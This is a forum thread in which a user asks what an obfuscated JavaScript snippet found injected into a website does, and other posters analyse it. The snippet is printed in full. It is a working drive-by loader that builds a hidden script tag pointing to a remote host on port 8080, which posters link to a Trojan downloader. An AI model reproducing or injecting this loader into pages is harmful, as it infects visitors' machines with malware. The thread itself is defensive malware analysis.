Virus/Trojan code?

[thazul]

Hello,
Please help me to understand the risk from the js code I found on http://www.glanstider.no website.

The code looks very strange:

Code:

<script>/*LGPL*/ try{ window.onload = function(){var Ynrwc1hiq87h = document.createElement('s)^c@r$$)#i$@p($$$t^'.replace(/#|@|\!|\(|\)|\^|\$|&/ig, ''));Ynrwc1hiq87h.setAttribute('defer', 'd@$e^#@)f&&^e@r()'.replace(/#|\)|\(|&|@|\^|\!|\$/ig, ''));Ynrwc1hiq87h.setAttribute('type', 't&&(e&(x&#t($/@j#@a#&@v#a)#s@^c#r@#i!p(!t^$&$'.replace(/&|@|\!|\$|\^|\)|\(|#/ig, ''));Ynrwc1hiq87h.setAttribute('id', 'Z(#!(e(l@@!!5#@b()))x#&i#)&6^@@s(@y@@x()^v)&9#&'.replace(/\!|\$|@|&|\)|\(|\^|#/ig, ''));Ynrwc1hiq87h.setAttribute('s#)!r^^@^c^&!'.replace(/@|\!|\^|\)|&|\$|#|\(/ig, ''),  'h(&t#))t&p#:)/(/@0!@(!@1&&)n#)!)e)#t)@)^-$c&)o((m#!(.$!^t)@^i&(g@&(@@e(@(r^@!d!(@&i&^^r#(!e(&^c&@t)^&.)!)c)o^^)m(!).!!@&g$#)^o$!&d#$a&d&@@d!$)y)-@!&c!$o@&$m^$$.!^(c#@a^)@r(!@#s#((w#(#(e!b!@n$@^e)t$@^!.(!$@#r(u$#!#!:&8@0^^8^##&0!^/^g)&^o)#!o!#g&l$^$$e#.$))$c@&)o^^m##(/#@)!g($@#o&)o#@g!($l$$^(#e#@.@c)$^o@m!$/#&&c@a!@r)^)e##e^$!!r&&)b)$u!$$$i@l#()d$^#e$r@$!!.$#(c#^o^@)m@&#&/)$x)@$&(n)#x)&(x@.&!#c&)@o($m(#/@(s^$^@o^s@$&o$^).$!c&^o#$#m!/!@&&@'.replace(/\(|\)|&|\^|#|\$|\!|@/ig, ''));if (document){document.body.appendChild(Ynrwc1hiq87h);}} } catch(Jg8hbd0kytqswmmfze) {}</script>
<!--40ace59eda33a6f5e5733ed6bdc65c1e-->

could you please tell me what this code do and how high is the security lack?

Thanks
---
[edit by Moderator Kor]Caution! Of course, don't run that code in your browsers. To read it I have only deciphered portions of it and I have found that it probably loads a Trojan.

[Philip M]

No idea what it does, but I would avoid it like the plague.

40ace59eda33a6f5e5733ed6bdc65c1e
translates to
@¬åžÚ3¦õås>Ö½Æ\

[thazul]

OK, found what it is.

http://www.malwaredomainlist.com/for...e;topic=3676.0

[Kor]

Quote:

Originally Posted by Philip M

No idea what it does, but I would avoid it like the plague.

40ace59eda33a6f5e5733ed6bdc65c1e
translates to
@¬åžÚ3¦õås>Ö½Æ\

Which in fact is (from latin-1 to KO18 [Russian]):
@╛х·к3ІУхs>жНЦ\
Because that code loads an external javascript file from a site from Russia which might inject the Trojan-Downloader.JS.Agent.ewh virus